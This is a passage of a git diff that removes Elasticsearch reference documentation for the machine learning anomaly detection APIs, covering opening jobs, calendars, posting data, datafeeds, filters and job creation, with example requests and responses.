categorization. - -`total_over_field_count`::: -(long) The number of _over_ field values analyzed. Note that these are counted -separately for each detector and partition. - -`total_partition_field_count`::: -(long) The number of _partition_ field values analyzed. -==== -//End model_size_stats - -`retain`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=retain] - -`snapshot_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - -`snapshot_doc_count`:: -(long) For internal use only. - -`timestamp`:: -(date) The creation timestamp for the snapshot. - -[[ml-get-snapshot-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/high_sum_total_sales/model_snapshots -{ - "start": "1575402236000" -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - -In this example, the API provides a single result: -[source,js] ----- -{ - "count" : 1, - "model_snapshots" : [ - { - "job_id" : "high_sum_total_sales", - "min_version" : "6.4.0", - "timestamp" : 1575402237000, - "description" : "State persisted due to job close at 2019-12-03T19:43:57+0000", - "snapshot_id" : "1575402237", - "snapshot_doc_count" : 1, - "model_size_stats" : { - "job_id" : "high_sum_total_sales", - "result_type" : "model_size_stats", - "model_bytes" : 1638816, - "model_bytes_exceeded" : 0, - "model_bytes_memory_limit" : 10485760, - "total_by_field_count" : 3, - "total_over_field_count" : 3320, - "total_partition_field_count" : 2, - "bucket_allocation_failures_count" : 0, - "memory_status" : "ok", - "categorized_doc_count" : 0, - "total_category_count" : 0, - "frequent_category_count" : 0, - "rare_category_count" : 0, - "dead_category_count" : 0, - "categorization_status" : "ok", - "log_time" : 1575402237000, - "timestamp" : 1576965600000 - }, - "latest_record_time_stamp" : 1576971072000, - "latest_result_time_stamp" : 1576965600000, - "retain" : false - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/index.asciidoc b/docs/reference/ml/anomaly-detection/apis/index.asciidoc deleted file mode 100644 index 7b3faaed20c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/index.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -include::ml-apis.asciidoc[leveloffset=+1] -//ADD -include::post-calendar-event.asciidoc[leveloffset=+2] -include::put-calendar-job.asciidoc[leveloffset=+2] -//CLOSE -include::close-job.asciidoc[leveloffset=+2] -//CREATE -include::put-job.asciidoc[leveloffset=+2] -include::put-calendar.asciidoc[leveloffset=+2] -include::put-datafeed.asciidoc[leveloffset=+2] -include::put-filter.asciidoc[leveloffset=+2] -//DELETE -include::delete-calendar.asciidoc[leveloffset=+2] -include::delete-datafeed.asciidoc[leveloffset=+2] -include::delete-calendar-event.asciidoc[leveloffset=+2] -include::delete-filter.asciidoc[leveloffset=+2] -include::delete-forecast.asciidoc[leveloffset=+2] -include::delete-job.asciidoc[leveloffset=+2] -include::delete-calendar-job.asciidoc[leveloffset=+2] -include::delete-snapshot.asciidoc[leveloffset=+2] -include::delete-expired-data.asciidoc[leveloffset=+2] -//ESTIMATE -include::estimate-model-memory.asciidoc[leveloffset=+2] -//FIND -include::find-file-structure.asciidoc[leveloffset=+2] -//FLUSH -include::flush-job.asciidoc[leveloffset=+2] -//FORECAST -include::forecast.asciidoc[leveloffset=+2] -//GET -include::get-bucket.asciidoc[leveloffset=+2] -include::get-calendar.asciidoc[leveloffset=+2] -include::get-category.asciidoc[leveloffset=+2] -include::get-datafeed.asciidoc[leveloffset=+2] -include::get-datafeed-stats.asciidoc[leveloffset=+2] -include::get-influencer.asciidoc[leveloffset=+2] -include::get-job.asciidoc[leveloffset=+2] -include::get-job-stats.asciidoc[leveloffset=+2] -include::get-ml-info.asciidoc[leveloffset=+2] -include::get-snapshot.asciidoc[leveloffset=+2] -include::get-overall-buckets.asciidoc[leveloffset=+2] -include::get-calendar-event.asciidoc[leveloffset=+2] -include::get-filter.asciidoc[leveloffset=+2] -include::get-record.asciidoc[leveloffset=+2] -//OPEN -include::open-job.asciidoc[leveloffset=+2] -//POST -include::post-data.asciidoc[leveloffset=+2] -//PREVIEW -include::preview-datafeed.asciidoc[leveloffset=+2] -//REVERT -include::revert-snapshot.asciidoc[leveloffset=+2] -//SET/START/STOP -include::set-upgrade-mode.asciidoc[leveloffset=+2] -include::start-datafeed.asciidoc[leveloffset=+2] -include::stop-datafeed.asciidoc[leveloffset=+2] -//UPDATE -include::update-datafeed.asciidoc[leveloffset=+2] -include::update-filter.asciidoc[leveloffset=+2] -include::update-job.asciidoc[leveloffset=+2] -include::update-snapshot.asciidoc[leveloffset=+2] -//VALIDATE -//include::validate-detector.asciidoc[leveloffset=+2] -//include::validate-job.asciidoc[leveloffset=+2] - diff --git a/docs/reference/ml/anomaly-detection/apis/ml-apis.asciidoc b/docs/reference/ml/anomaly-detection/apis/ml-apis.asciidoc deleted file mode 100644 index fb2b41d646b..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/ml-apis.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-apis]] -= {ml-cap} {anomaly-detect} APIs - -You can use the following APIs to perform {ml} {anomaly-detect} activities. - -See also <>. - -[discrete] -[[ml-api-anomaly-job-endpoint]] -== {anomaly-jobs-cap} -//* <>, <> -* <> or <> -* <> or <> -* <> or <> -* <> or <> -* <> -* <> -* <> -* <> or <> - - -[discrete] -[[ml-api-calendar-endpoint]] -== Calendars - -* <>, <> -* <>, <> -* <>, <> -* <>, <> - -[discrete] -[[ml-api-filter-endpoint]] -== Filters - -* <>, <> -* <> -* <> - -[discrete] -[[ml-api-datafeed-endpoint]] -== {dfeeds-cap} - -* <>, <> -* <>, <> -* <>, <> -* <> -* <> - - -[discrete] -[[ml-api-snapshot-endpoint]] -== Model Snapshots - -* <> -* <> -* <> -* <> - - -[discrete] -[[ml-api-result-endpoint]] -== Results - -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[ml-api-file-structure-endpoint]] -== File structure - -* <> - -[discrete] -[[ml-api-ml-info-endpoint]] -== Info - -* <> - -[discrete] -[[ml-api-delete-expired-data-endpoint]] -== Delete expired data - -* <> - -[discrete] -[[ml-set-upgrade-mode-endpoint]] -== Set upgrade mode - -* <> diff --git a/docs/reference/ml/anomaly-detection/apis/open-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/open-job.asciidoc deleted file mode 100644 index 94f9deb97d5..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/open-job.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-open-job]] -= Open {anomaly-jobs} API -++++ -Open jobs -++++ - -Opens one or more {anomaly-jobs}. - -[[ml-open-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors/{job_id}/_open` - -[[ml-open-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-open-job-desc]] -== {api-description-title} - -An {anomaly-job} must be opened in order for it to be ready to receive and -analyze data. It can be opened and closed multiple times throughout its -lifecycle. - -When you open a new job, it starts with an empty model. - -When you open an existing job, the most recent model state is automatically -loaded. The job is ready to resume its analysis from where it left off, once new -data is received. - -[[ml-open-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-open-job-request-body]] -== {api-request-body-title} - -`timeout`:: - (Optional, time) Controls the time to wait until a job has opened. The default - value is 30 minutes. - -[[ml-open-job-response-body]] -== {api-response-body-title} - -`node`:: - (string) The ID of the node that the job was opened on. If the job is allowed to -open lazily and has not yet been assigned to a node, this value is an empty string. - -`opened`:: - (Boolean) For a successful response, this value is always `true`. On failure, an - exception is returned instead. - -[[ml-open-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/total-requests/_open -{ - "timeout": "35m" -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_job] - -When the job opens, you receive the following results: - -[source,console-result] ----- -{ - "opened" : true, - "node" : "node-1" -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/post-calendar-event.asciidoc b/docs/reference/ml/anomaly-detection/apis/post-calendar-event.asciidoc deleted file mode 100644 index cba26ffbeca..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/post-calendar-event.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-post-calendar-event]] -= Add events to calendar API -++++ -Add events to calendar -++++ - -Posts scheduled events in a calendar. - -[[ml-post-calendar-event-request]] -== {api-request-title} - -`POST _ml/calendars//events` - -[[ml-post-calendar-event-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-post-calendar-event-desc]] -== {api-description-title} - -This API accepts a list of {ml-docs}/ml-calendars.html[scheduled events], each -of which must have a start time, end time, and description. - -[[ml-post-calendar-event-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::../../ml-shared.asciidoc[tag=calendar-id] - -[role="child_attributes"] -[[ml-post-calendar-event-request-body]] -== {api-request-body-title} - -`events`:: -(Required, array) A list of one of more scheduled events. The event's start and -end times may be specified as integer milliseconds since the epoch or as a -string in ISO 8601 format. -+ -.Properties of events -[%collapsible%open] -==== -`description`::: -(Optional, string) A description of the scheduled event. - -`end_time`::: -(Required, date) The timestamp for the end of the scheduled event in -milliseconds since the epoch or ISO 8601 format. - -`start_time`::: -(Required, date) The timestamp for the beginning of the scheduled event in -milliseconds since the epoch or ISO 8601 format. -==== - -[[ml-post-calendar-event-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/calendars/planned-outages/events -{ - "events" : [ - {"description": "event 1", "start_time": 1513641600000, "end_time": 1513728000000}, - {"description": "event 2", "start_time": 1513814400000, "end_time": 1513900800000}, - {"description": "event 3", "start_time": 1514160000000, "end_time": 1514246400000} - ] -} --------------------------------------------------- -// TEST[skip:setup:calendar_outages_addjob] - -The API returns the following results: - -[source,console-result] ----- -{ - "events": [ - { - "description": "event 1", - "start_time": 1513641600000, - "end_time": 1513728000000, - "calendar_id": "planned-outages" - }, - { - "description": "event 2", - "start_time": 1513814400000, - "end_time": 1513900800000, - "calendar_id": "planned-outages" - }, - { - "description": "event 3", - "start_time": 1514160000000, - "end_time": 1514246400000, - "calendar_id": "planned-outages" - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/post-data.asciidoc b/docs/reference/ml/anomaly-detection/apis/post-data.asciidoc deleted file mode 100644 index 42b385a5159..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/post-data.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-post-data]] -= Post data to jobs API -++++ -Post data to jobs -++++ - -Sends data to an anomaly detection job for analysis. - -[[ml-post-data-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_data` - -[[ml-post-data-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-post-data-desc]] -== {api-description-title} - -The job must have a state of `open` to receive and process the data. - -The data that you send to the job must use the JSON format. Multiple JSON -documents can be sent, either adjacent with no separator in between them or -whitespace separated. Newline delimited JSON (NDJSON) is a possible whitespace -separated format, and for this the `Content-Type` header should be set to -`application/x-ndjson`. - -Upload sizes are limited to the Elasticsearch HTTP receive buffer size -(default 100 Mb). If your data is larger, split it into multiple chunks -and upload each one separately in sequential time order. When running in -real time, it is generally recommended that you perform many small uploads, -rather than queueing data to upload larger files. - -When uploading data, check the job data counts for progress. -The following documents will not be processed: - -* Documents not in chronological order and outside the latency window -* Records with an invalid timestamp - -IMPORTANT: For each job, data can only be accepted from a single connection at -a time. It is not currently possible to post data to multiple jobs using wildcards -or a comma-separated list. - -[[ml-post-data-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-post-data-query-parms]] -== {api-query-parms-title} - -`reset_start`:: - (Optional, string) Specifies the start of the bucket resetting range. - -`reset_end`:: - (Optional, string) Specifies the end of the bucket resetting range. - -[[ml-post-data-request-body]] -== {api-request-body-title} - -A sequence of one or more JSON documents containing the data to be analyzed. -Only whitespace characters are permitted in between the documents. - -[[ml-post-data-example]] -== {api-examples-title} - -The following example posts data from the `it_ops_new_kpi.json` file to the -`it_ops_new_kpi` job: - -[source,js] --------------------------------------------------- -$ curl -s -H "Content-type: application/json" --X POST http:\/\/localhost:9200/_ml/anomaly_detectors/it_ops_new_kpi/_data ---data-binary @it_ops_new_kpi.json --------------------------------------------------- - -When the data is sent, you receive information about the operational progress of -the job. For example: - -[source,js] ----- -{ - "job_id":"it_ops_new_kpi", - "processed_record_count":21435, - "processed_field_count":64305, - "input_bytes":2589063, - "input_field_count":85740, - "invalid_date_count":0, - "missing_field_count":0, - "out_of_order_timestamp_count":0, - "empty_bucket_count":16, - "sparse_bucket_count":0, - "bucket_count":2165, - "earliest_record_timestamp":1454020569000, - "latest_record_timestamp":1455318669000, - "last_data_time":1491952300658, - "latest_empty_bucket_timestamp":1454541600000, - "input_record_count":21435 -} ----- - -For more information about these properties, see <>. diff --git a/docs/reference/ml/anomaly-detection/apis/preview-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/preview-datafeed.asciidoc deleted file mode 100644 index e36f9cc9cd5..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/preview-datafeed.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-preview-datafeed]] -= Preview {dfeeds} API - -[subs="attributes"] -++++ -Preview {dfeeds} -++++ - -Previews a {dfeed}. - -[[ml-preview-datafeed-request]] -== {api-request-title} - -`GET _ml/datafeeds//_preview` - -[[ml-preview-datafeed-prereqs]] -== {api-prereq-title} - -* If {es} {security-features} are enabled, you must have `monitor_ml`, `monitor`, -`manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-preview-datafeed-desc]] -== {api-description-title} - -The preview {dfeeds} API returns the first "page" of results from the `search` -that is created by using the current {dfeed} settings. This preview shows the -structure of the data that will be passed to the anomaly detection engine. - -IMPORTANT: When {es} {security-features} are enabled, the {dfeed} query is -previewed using the credentials of the user calling the preview {dfeed} API. -When the {dfeed} is started it runs the query using the roles of the last user -to create or update it. If the two sets of roles differ then the preview may -not accurately reflect what the {dfeed} will return when started. To avoid -such problems, the same user that creates or updates the {dfeed} should preview -it to ensure it is returning the expected data. Alternatively, use -<> to -supply the credentials. - -[[ml-preview-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[[ml-preview-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/datafeeds/datafeed-high_sum_total_sales/_preview --------------------------------------------------- -// TEST[skip:Kibana sample data] - -The data that is returned for this example is as follows: - -[source,console-result] ----- -[ - { - "order_date" : 1575504259000, - "category.keyword" : "Men's Clothing", - "customer_full_name.keyword" : "Sultan Al Benson", - "taxful_total_price" : 35.96875 - }, - { - "order_date" : 1575504518000, - "category.keyword" : [ - "Women's Accessories", - "Women's Clothing" - ], - "customer_full_name.keyword" : "Pia Webb", - "taxful_total_price" : 83.0 - }, - { - "order_date" : 1575505382000, - "category.keyword" : [ - "Women's Accessories", - "Women's Shoes" - ], - "customer_full_name.keyword" : "Brigitte Graham", - "taxful_total_price" : 72.0 - }, - ... -] ----- diff --git a/docs/reference/ml/anomaly-detection/apis/put-calendar-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-calendar-job.asciidoc deleted file mode 100644 index 93ea1b2156c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-calendar-job.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-calendar-job]] -= Add {anomaly-jobs} to calendar API -++++ -Add jobs to calendar -++++ - -Adds an {anomaly-job} to a calendar. - -[[ml-put-calendar-job-request]] -== {api-request-title} - -`PUT _ml/calendars//jobs/` - -[[ml-put-calendar-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-put-calendar-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-list] - -[[ml-put-calendar-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/calendars/planned-outages/jobs/total-requests --------------------------------------------------- -// TEST[skip:setup:calendar_outages_openjob] - -The API returns the following results: - -[source,console-result] ----- -{ - "calendar_id": "planned-outages", - "job_ids": [ - "total-requests" - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/put-calendar.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-calendar.asciidoc deleted file mode 100644 index d39ed5c7ef1..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-calendar.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-calendar]] -= Create calendars API -++++ -Create calendars -++++ - -Instantiates a calendar. - -[[ml-put-calendar-request]] -== {api-request-title} - -`PUT _ml/calendars/` - -[[ml-put-calendar-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-put-calendar-desc]] -== {api-description-title} - -For more information, see -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[[ml-put-calendar-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -[[ml-put-calendar-request-body]] -== {api-request-body-title} - -`description`:: - (Optional, string) A description of the calendar. - -[[ml-put-calendar-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/calendars/planned-outages --------------------------------------------------- -// TEST[skip:need-license] - -When the calendar is created, you receive the following results: - -[source,console-result] ----- -{ - "calendar_id": "planned-outages", - "job_ids": [] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/put-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-datafeed.asciidoc deleted file mode 100644 index 7bc529bfba2..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-datafeed.asciidoc +++ /dev/null @@ -1,145 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-datafeed]] -= Create {dfeeds} API - -[subs="attributes"] -++++ -Create {dfeeds} -++++ - -Instantiates a {dfeed}. - -[[ml-put-datafeed-request]] -== {api-request-title} - -`PUT _ml/datafeeds/` - -[[ml-put-datafeed-prereqs]] -== {api-prereq-title} - -* You must create an {anomaly-job} before you create a {dfeed}. -* If {es} {security-features} are enabled, you must have `manage_ml` or `manage` -cluster privileges to use this API. See <> and -{ml-docs-setup-privileges}. - -[[ml-put-datafeed-desc]] -== {api-description-title} - -{ml-docs}/ml-dfeeds.html[{dfeeds-cap}] retrieve data from {es} for analysis by -an {anomaly-job}. You can associate only one {dfeed} to each {anomaly-job}. - -The {dfeed} contains a query that runs at a defined interval (`frequency`). If -you are concerned about delayed data, you can add a delay (`query_delay`) at -each interval. See {ml-docs}/ml-delayed-data-detection.html[Handling delayed data]. - -[IMPORTANT] -==== -* You must use {kib} or this API to create a {dfeed}. Do not put a -{dfeed} directly to the `.ml-config` index using the {es} index API. If {es} -{security-features} are enabled, do not give users `write` privileges on the -`.ml-config` index. -* When {es} {security-features} are enabled, your {dfeed} remembers which roles -the user who created it had at the time of creation and runs the query using -those same roles. If you provide -<>, those -credentials are used instead. -==== - -[[ml-put-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[role="child_attributes"] -[[ml-put-datafeed-request-body]] -== {api-request-body-title} - -`aggregations`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=aggregations] - -`chunking_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=chunking-config] - -`delayed_data_check_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=delayed-data-check-config] - -`frequency`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=frequency] - -`indices`:: -(Required, array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=indices] - -`job_id`:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`max_empty_searches`:: -(Optional,integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-empty-searches] - -`query`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=query] - -`query_delay`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=query-delay] - -`script_fields`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=script-fields] - -`scroll_size`:: -(Optional, unsigned integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=scroll-size] - -`indices_options`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=indices-options] - - -[[ml-put-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/datafeeds/datafeed-total-requests -{ - "job_id": "total-requests", - "indices": ["server-metrics"] -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_job] - -When the {dfeed} is created, you receive the following results: - -[source,console-result] ----- -{ - "datafeed_id": "datafeed-total-requests", - "job_id": "total-requests", - "query_delay": "83474ms", - "indices": [ - "server-metrics" - ], - "query": { - "match_all": { - "boost": 1.0 - } - }, - "scroll_size": 1000, - "chunking_config": { - "mode": "auto" - } -} ----- -// TESTRESPONSE[s/"query_delay": "83474ms"/"query_delay": $body.query_delay/] -// TESTRESPONSE[s/"query.boost": "1.0"/"query.boost": $body.query.boost/] diff --git a/docs/reference/ml/anomaly-detection/apis/put-filter.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-filter.asciidoc deleted file mode 100644 index a4c66b9ce04..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-filter.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-filter]] -= Create filters API -++++ -Create filters -++++ - -Instantiates a filter. - -[[ml-put-filter-request]] -== {api-request-title} - -`PUT _ml/filters/` - -[[ml-put-filter-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-put-filter-desc]] -== {api-description-title} - -A {ml-docs}/ml-rules.html[filter] contains a list of strings. -It can be used by one or more jobs. Specifically, filters are referenced in -the `custom_rules` property of detector configuration objects. - -[[ml-put-filter-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -[[ml-put-filter-request-body]] -== {api-request-body-title} - -`description`:: - (Optional, string) A description of the filter. - -`items`:: - (Required, array of strings) The items of the filter. A wildcard `*` can be - used at the beginning or the end of an item. Up to 10000 items are allowed in - each filter. - -[[ml-put-filter-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/filters/safe_domains -{ - "description": "A list of safe domains", - "items": ["*.google.com", "wikipedia.org"] -} --------------------------------------------------- -// TEST[skip:need-licence] - -When the filter is created, you receive the following response: - -[source,console-result] ----- -{ - "filter_id": "safe_domains", - "description": "A list of safe domains", - "items": ["*.google.com", "wikipedia.org"] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/put-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-job.asciidoc deleted file mode 100644 index 4a779ee2f52..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-job.asciidoc +++ /dev/null @@ -1,356 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-job]] -= Create {anomaly-jobs} API -++++ -Create jobs -++++ - -Instantiates an {anomaly-job}. - -[[ml-put-job-request]] -== {api-request-title} - -`PUT _ml/anomaly_detectors/` - -[[ml-put-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-put-job-desc]] -== {api-description-title} - -IMPORTANT: You must use {kib} or this API to create an {anomaly-job}. Do not put -a job directly to the `.ml-config` index using the {es} index API. If {es} -{security-features} are enabled, do not give users `write` privileges on the -`.ml-config` index. - -[[ml-put-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-define] - -[role="child_attributes"] -[[ml-put-job-request-body]] -== {api-request-body-title} - -`allow_lazy_open`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-lazy-open] - -//Begin analysis_config -[[put-analysisconfig]]`analysis_config`:: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=analysis-config] -+ -.Properties of `analysis_config` -[%collapsible%open] -==== -`bucket_span`::: -(<>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span] - -`categorization_analyzer`::: -(object or string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-analyzer] - -`categorization_field_name`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-field-name] - -`categorization_filters`::: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-filters] - -//Begin analysis_config.detectors -`detectors`::: -(array) An array of detector configuration objects. Detector configuration -objects specify which data fields a job analyzes. They also specify which -analytical functions are used. You can specify multiple detectors for a job. -+ -NOTE: If the `detectors` array does not contain at least one detector, -no analysis can occur and an error is returned. -+ -.Properties of `detectors` -[%collapsible%open] -===== -`by_field_name`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=by-field-name] - -//Begin analysis_config.detectors.custom_rules -[[put-customrules]]`custom_rules`:::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules] -+ -.Properties of `custom_rules` -[%collapsible%open] -====== - -`actions`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-actions] - -//Begin analysis_config.detectors.custom_rules.conditions -`conditions`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions] -+ -.Properties of `conditions` -[%collapsible%open] -======= -`applies_to`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-applies-to] - -`operator`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-operator] - -`value`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-value] -======= -//End analysis_config.detectors.custom_rules.conditions - -//Begin analysis_config.detectors.custom_rules.scope -`scope`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope] -+ -.Properties of `scope` -[%collapsible%open] -======= -`filter_id`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope-filter-id] - -`filter_type`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope-filter-type] -======= -//End analysis_config.detectors.custom_rules.scope -====== -//End analysis_config.detectors.custom_rules - -`detector_description`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-description] - -`detector_index`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-index] -+ -If you specify a value for this property, it is ignored. - -`exclude_frequent`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-frequent] - -`field_name`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-field-name] - -`function`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=function] - -`over_field_name`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=over-field-name] - -`partition_field_name`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=partition-field-name] - -`use_null`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=use-null] -===== -//End analysis_config.detectors - -`influencers`::: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=influencers] - -`latency`::: -(<>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latency] - -`multivariate_by_fields`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=multivariate-by-fields] - -//Begin analysis_config.per_partition_categorization -`per_partition_categorization`::: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization] -+ -.Properties of `per_partition_categorization` -[%collapsible%open] -===== -`enabled`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization-enabled] - -`stop_on_warn`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization-stop-on-warn] -===== -//End analysis_config.per_partition_categorization - -`summary_count_field_name`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=summary-count-field-name] -==== -//End analysis_config - -//Begin analysis_limits 